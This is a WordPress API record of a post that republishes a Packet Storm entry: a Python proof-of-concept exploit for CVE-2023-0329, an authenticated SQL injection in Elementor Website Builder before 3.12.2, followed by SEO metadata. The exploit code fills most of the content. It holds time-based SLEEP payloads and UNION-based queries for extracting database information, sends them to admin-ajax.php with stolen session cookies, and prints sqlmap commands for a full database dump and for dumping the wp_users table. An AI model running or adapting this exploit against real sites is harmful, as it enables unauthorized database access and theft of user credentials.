{"id":30767,"date":"2025-12-12T11:58:35","date_gmt":"2025-12-12T11:58:35","guid":{"rendered":"http:\/\/localhost\/?p=30767"},"modified":"2025-12-12T11:58:35","modified_gmt":"2025-12-12T11:58:35","slug":"elementor-website-builder-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=30767","title":{"rendered":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-12T17:14:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Elementor Website Builder SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212773&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-0329&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Elementor Website Builder \\u003c 3.12.2 &#8211; Admin+ SQL Injection Exploit                                                           |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/elementor.com\/                                                                                                      |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/175639\/ \\u0026 \\tCVE-2023-0329\\n    \\n    \\n    [+] Summary : \\n              \\n              an authenticated SQL Injection vulnerability in Elementor Website Builder versions prior to 3.12.2. \\n    \\t\\t  The vulnerability allows authenticated attackers with at least author-level privileges to execute arbitrary SQL commands, potentially leading to complete database compromise.\\n    \\t\\t  The vulnerability exists in the AJAX request handler where user input in the data parameter is not properly sanitized before being used in SQL queries.\\n    \\t\\n    [+] POC :  python poc.py\\n    \\n    #!\/usr\/bin\/env python3\\n    \\&#8221;\\&#8221;\\&#8221;\\n    Elementor Website Builder \\u003c 3.12.2 SQL Injection Exploit (CVE-2023-0329)\\n    Author: indoushka\\n    \\&#8221;\\&#8221;\\&#8221;\\n    \\n    import requests\\n    import time\\n    import sys\\n    import urllib3\\n    from argparse import ArgumentParser\\n    \\n    # Disable SSL warnings\\n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n    \\n    class ElementorExploit:\\n        def __init__(self, target, cookies=None, auth_token=None):\\n            self.target = target.rstrip(&#8216;\/&#8217;)\\n            self.session = requests.Session()\\n            self.cookies = cookies\\n            self.auth_token = auth_token\\n            \\n            self.session.headers.update({\\n                &#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;,\\n                &#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded&#8217;,\\n                &#8216;X-Requested-With&#8217;: &#8216;XMLHttpRequest&#8217;\\n            })\\n            \\n            if self.cookies:\\n                self.session.cookies.update(self.cookies)\\n        \\n        def check_vulnerability(self):\\n            \\&#8221;\\&#8221;\\&#8221;Check if target is vulnerable to SQL Injection\\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[*] Checking vulnerability for: {self.target}\\&#8221;)\\n            \\n            # Time-based SQL injection payload\\n            payloads = [\\n                \\&#8221;test&#8217;),meta_key=&#8217;key4&#8217;where+meta_id=SLEEP(5);#\\&#8221;,\\n                \\&#8221;test&#8217; AND (SELECT * FROM (SELECT(SLEEP(5)))a)&#8211; \\&#8221;,\\n                \\&#8221;test&#8217; AND SLEEP(5) AND &#8216;1&#8217;=&#8217;1\\&#8221;\\n            ]\\n            \\n            for payload in payloads:\\n                url = f\\&#8221;{self.target}\/wp-admin\/admin-ajax.php\\&#8221;\\n                \\n                data = {\\n                    \\&#8221;action\\&#8221;: \\&#8221;elementor_ajax_save_builder\\&#8221;,\\n                    \\&#8221;editor_post_id\\&#8221;: \\&#8221;1\\&#8221;,\\n                    \\&#8221;post_id\\&#8221;: \\&#8221;1\\&#8221;,\\n                    \\&#8221;data\\&#8221;: payload\\n                }\\n                \\n                # Add auth token if provided\\n                if self.auth_token:\\n                    data[&#8216;_wpnonce&#8217;] = self.auth_token\\n                \\n                try:\\n                    start_time = time.time()\\n                    response = self.session.post(url, data=data, timeout=10, verify=False)\\n                    end_time = time.time()\\n                    \\n                    response_time = end_time &#8211; start_time\\n                    \\n                    if response_time \\u003e= 5:\\n                        print(f\\&#8221;[+] Time-based SQL Injection confirmed! (Delay: {response_time:.2f}s)\\&#8221;)\\n                        print(f\\&#8221;[+] Payload: {payload}\\&#8221;)\\n                        return True\\n                    else:\\n                        print(f\\&#8221;[-] No delay with payload: {payload}\\&#8221;)\\n                        \\n                except requests.exceptions.Timeout:\\n                    print(f\\&#8221;[+] Request timeout &#8211; possible SQL injection success\\&#8221;)\\n                    return True\\n                except Exception as e:\\n                    print(f\\&#8221;[-] Error with payload {payload}: {e}\\&#8221;)\\n            \\n            return False\\n        \\n        def exploit_union(self):\\n            \\&#8221;\\&#8221;\\&#8221;Union-based data extraction\\&#8221;\\&#8221;\\&#8221;\\n            print(\\&#8221;[*] Attempting UNION-based data extraction\\&#8221;)\\n            \\n            # First, determine number of columns\\n            for col_count in range(1, 10):\\n                nulls = &#8216;,&#8217;.join([str(i) for i in range(1, col_count + 1)])\\n                payload = f\\&#8221;test&#8217; UNION SELECT {nulls}&#8211; \\&#8221;\\n                \\n                url = f\\&#8221;{self.target}\/wp-admin\/admin-ajax.php\\&#8221;\\n                data = {\\n                    \\&#8221;action\\&#8221;: \\&#8221;elementor_ajax_save_builder\\&#8221;,\\n                    \\&#8221;editor_post_id\\&#8221;: \\&#8221;1\\&#8221;, \\n                    \\&#8221;post_id\\&#8221;: \\&#8221;1\\&#8221;,\\n                    \\&#8221;data\\&#8221;: payload\\n                }\\n                \\n                if self.auth_token:\\n                    data[&#8216;_wpnonce&#8217;] = self.auth_token\\n                \\n                try:\\n                    response = self.session.post(url, data=data, timeout=10, verify=False)\\n                    \\n                    # Check for successful UNION\\n                    if response.status_code == 200 and \\&#8221;error\\&#8221; not in response.text.lower():\\n                        print(f\\&#8221;[+] UNION successful with {col_count} columns\\&#8221;)\\n                        \\n                        # Extract database information\\n                        self.extract_database_info(col_count)\\n                        return True\\n                        \\n                except Exception as e:\\n                    print(f\\&#8221;[-] Error with {col_count} columns: {e}\\&#8221;)\\n            \\n            return False\\n        \\n        def extract_database_info(self, column_count):\\n            \\&#8221;\\&#8221;\\&#8221;Extract database information using UNION\\&#8221;\\&#8221;\\&#8221;\\n            print(\\&#8221;[*] Extracting database information&#8230;\\&#8221;)\\n            \\n            # Extract database version\\n            version_payloads = [\\n                f\\&#8221;test&#8217; UNION SELECT 1,@@version,{&#8216;,&#8217;.join([str(i) for i in range(3, column_count + 1)])}&#8211; \\&#8221;,\\n                f\\&#8221;test&#8217; UNION SELECT 1,version(),{&#8216;,&#8217;.join([str(i) for i in range(3, column_count + 1)])}&#8211; \\&#8221;,\\n                f\\&#8221;test&#8217; UNION SELECT 1,user(),{&#8216;,&#8217;.join([str(i) for i in range(3, column_count + 1)])}&#8211; \\&#8221;\\n            ]\\n            \\n            for payload in version_payloads:\\n                url = f\\&#8221;{self.target}\/wp-admin\/admin-ajax.php\\&#8221;\\n                data = {\\n                    \\&#8221;action\\&#8221;: \\&#8221;elementor_ajax_save_builder\\&#8221;,\\n                    \\&#8221;editor_post_id\\&#8221;: \\&#8221;1\\&#8221;,\\n                    \\&#8221;post_id\\&#8221;: \\&#8221;1\\&#8221;, \\n                    \\&#8221;data\\&#8221;: payload\\n                }\\n                \\n                if self.auth_token:\\n                    data[&#8216;_wpnonce&#8217;] = self.auth_token\\n                \\n                try:\\n                    response = self.session.post(url, data=data, timeout=10, verify=False)\\n                    if response.status_code == 200:\\n                        print(\\&#8221;[+] Database information extracted successfully\\&#8221;)\\n                        # Parse response for version\/user info\\n                        break\\n                except Exception as e:\\n                    print(f\\&#8221;[-] Error extracting info: {e}\\&#8221;)\\n        \\n        def generate_sqlmap_commands(self):\\n            \\&#8221;\\&#8221;\\&#8221;Generate sqlmap commands for automated exploitation\\&#8221;\\&#8221;\\&#8221;\\n            print(\\&#8221;\\\\n[+] SQLMap Commands:\\&#8221;)\\n            print(\\&#8221;=\\&#8221; * 60)\\n            \\n            target_url = f\\&#8221;{self.target}\/wp-admin\/admin-ajax.php\\&#8221;\\n            \\n            print(\\&#8221;# Basic detection (with auth):\\&#8221;)\\n            print(f&#8217;sqlmap -u \\&#8221;{target_url}\\&#8221; &#8211;data=\\&#8221;action=elementor_ajax_save_builder\\u0026editor_post_id=1\\u0026post_id=1\\u0026data=test\\&#8221; &#8211;cookie=\\&#8221;[COOKIES]\\&#8221; &#8211;batch&#8217;)\\n            \\n            print(\\&#8221;\\\\n# Full database dump:\\&#8221;)\\n            print(f&#8217;sqlmap -u \\&#8221;{target_url}\\&#8221; &#8211;data=\\&#8221;action=elementor_ajax_save_builder\\u0026editor_post_id=1\\u0026post_id=1\\u0026data=test\\&#8221; &#8211;cookie=\\&#8221;[COOKIES]\\&#8221; &#8211;batch &#8211;dump-all&#8217;)\\n            \\n            print(\\&#8221;\\\\n# Extract WordPress users:\\&#8221;)\\n            print(f&#8217;sqlmap -u \\&#8221;{target_url}\\&#8221; &#8211;data=\\&#8221;action=elementor_ajax_save_builder\\u0026editor_post_id=1\\u0026post_id=1\\u0026data=test\\&#8221; &#8211;cookie=\\&#8221;[COOKIES]\\&#8221; &#8211;batch -D wordpress -T wp_users &#8211;dump&#8217;)\\n        \\n        def comprehensive_scan(self):\\n            \\&#8221;\\&#8221;\\&#8221;Run comprehensive vulnerability assessment\\&#8221;\\&#8221;\\&#8221;\\n            print(\\&#8221;[*] Starting comprehensive Elementor SQLi scan&#8230;\\&#8221;)\\n            \\n            # Check authentication\\n            if not self.cookies and not self.auth_token:\\n                print(\\&#8221;[-] No authentication provided &#8211; some tests may fail\\&#8221;)\\n            \\n            # Check vulnerability\\n            if self.check_vulnerability():\\n                print(\\&#8221;\\\\n[+] Target is VULNERABLE to SQL Injection\\&#8221;)\\n                \\n                # Attempt data extraction\\n                print(\\&#8221;\\\\n[*] Attempting data extraction&#8230;\\&#8221;)\\n                self.exploit_union()\\n                \\n                # Generate sqlmap commands\\n                self.generate_sqlmap_commands()\\n            else:\\n                print(\\&#8221;\\\\n[-] Target does not appear to be vulnerable\\&#8221;)\\n    \\n    def main():\\n        banner = \\&#8221;\\&#8221;\\&#8221;\\n    \\n    \u2588\u2588\u2557\u2588\u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n    \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n    \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588   \u2588\u2554\u255d\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n    \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n    \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\\n    \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\\n        \\n        Elementor Website Builder SQL Injection Exploit (CVE-2023-0329)\\n        By: indoushka\\n        \\&#8221;\\&#8221;\\&#8221;\\n        print(banner)\\n        \\n        parser = ArgumentParser(description=&#8217;Elementor SQL Injection Exploit&#8217;)\\n        parser.add_argument(&#8216;-u&#8217;, &#8216;&#8211;url&#8217;, required=True, help=&#8217;Target URL (e.g., https:\/\/example.com)&#8217;)\\n        parser.add_argument(&#8216;-c&#8217;, &#8216;&#8211;cookies&#8217;, help=&#8217;Authentication cookies (e.g., \\&#8221;wordpress_logged_in=xxx\\&#8221;)&#8217;)\\n        parser.add_argument(&#8216;-t&#8217;, &#8216;&#8211;token&#8217;, help=&#8217;WordPress nonce token&#8217;)\\n        parser.add_argument(&#8216;&#8211;check&#8217;, action=&#8217;store_true&#8217;, help=&#8217;Check vulnerability only&#8217;)\\n        parser.add_argument(&#8216;&#8211;exploit&#8217;, action=&#8217;store_true&#8217;, help=&#8217;Run full exploitation&#8217;)\\n        parser.add_argument(&#8216;&#8211;sqlmap&#8217;, action=&#8217;store_true&#8217;, help=&#8217;Generate sqlmap commands&#8217;)\\n        \\n        args = parser.parse_args()\\n        \\n        # Parse cookies if provided\\n        cookies_dict = {}\\n        if args.cookies:\\n            for cookie in args.cookies.split(&#8216;;&#8217;):\\n                if &#8216;=&#8217; in cookie:\\n                    key, value = cookie.strip().split(&#8216;=&#8217;, 1)\\n                    cookies_dict[key] = value\\n        \\n        exploit = ElementorExploit(args.url, cookies=cookies_dict, auth_token=args.token)\\n        \\n        if args.check:\\n            if exploit.check_vulnerability():\\n                print(\\&#8221;\\\\n[!] Target is VULNERABLE to SQL Injection\\&#8221;)\\n            else:\\n                print(\\&#8221;\\\\n[!] Target does not appear to be vulnerable\\&#8221;)\\n        \\n        elif args.exploit:\\n            exploit.comprehensive_scan()\\n        \\n        elif args.sqlmap:\\n            exploit.generate_sqlmap_commands()\\n        \\n        else:\\n            # Default: comprehensive scan\\n            exploit.comprehensive_scan()\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        if len(sys.argv) == 1:\\n            print(\\&#8221;Usage: python elementor_exploit.py -u https:\/\/target.com\\&#8221;)\\n            print(\\&#8221;Options: &#8211;check, &#8211;exploit, &#8211;sqlmap\\&#8221;)\\n            print(\\&#8221;Authentication: -c &#8216;wordpress_logged_in=xxx&#8217; -t [nonce_token]\\&#8221;)\\n            sys.exit(1)\\n        \\n        main()\\n    \\t\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212773&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.2,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212773\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-12T17:14:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Elementor Website Builder SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212773&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-0329&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | #&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-30767","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=30767\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-12T17:14:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Elementor Website Builder SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212773&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-0329&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=30767\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-12T11:58:35+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773\",\"datePublished\":\"2025-12-12T11:58:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\"},\"wordCount\":1462,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\",\"name\":\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-12T11:58:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=30767","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-12T17:14:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-12T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Elementor Website Builder SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212773&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-0329&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | #...","og_url":"https:\/\/zero.redgem.net\/?p=30767","og_site_name":"zero redgem","article_published_time":"2025-12-12T11:58:35+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=30767#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=30767"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Elementor Website Builder SQL 